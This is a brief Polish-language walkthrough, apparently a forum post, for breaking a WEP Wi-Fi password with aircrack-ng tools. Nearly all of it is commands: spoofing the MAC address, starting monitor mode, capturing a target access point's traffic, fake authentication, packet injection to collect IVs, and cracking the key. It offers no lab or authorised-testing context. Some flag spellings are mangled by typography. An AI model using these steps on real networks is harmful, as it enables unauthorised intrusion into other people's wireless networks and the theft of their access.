· Sprawdzamy dostepne interfejsy: airmon-ng
· Zatrzymujemy aktualny tryb karty: airmon-ng stop wlan0
· Zatrzymujemy interfejs: ifconfig wlan0 down
· Zmieniamy mac adres: macchanger - -mac 00:11:22:33:44:55 wlan0
· Uruchamiamy interfejs w trybie monitoringu: airmon-ng start wlan0
· Sprawdzamy dostępne AP i ich parametry: airodump-ng wlan0
· Crtl + c
· Uruchamiamy na wybranym kanale: airodump-ng –c [nr_kanalu] –w [nazwa pliku] - -bssid [bssid_ap] wlan0
· Nowe okno konsoli
· Uwierzytelniamy się AP: aireplay-ng -1 0 –a [bssid] –h 00:11:22:33:44:55 (opcjonalnie –e [essid]) wlan0
· Uruchamiamy wstrzykiwanie pakietów: aireplay-ng -3 –b [bssid] –h 00:11:22:33:44:55 wlan0
· Przy przy 15-20 tys IVS możemy przystepować do ataku. Otwieramy nowe okno konsoli
· Łamiemy hasło: aircrack-ng –n 64 –b [bssid] [nazwa pliku].cap (to nazwa pliku w którym są zebrane ivs)
· GOTOWE
przygodka23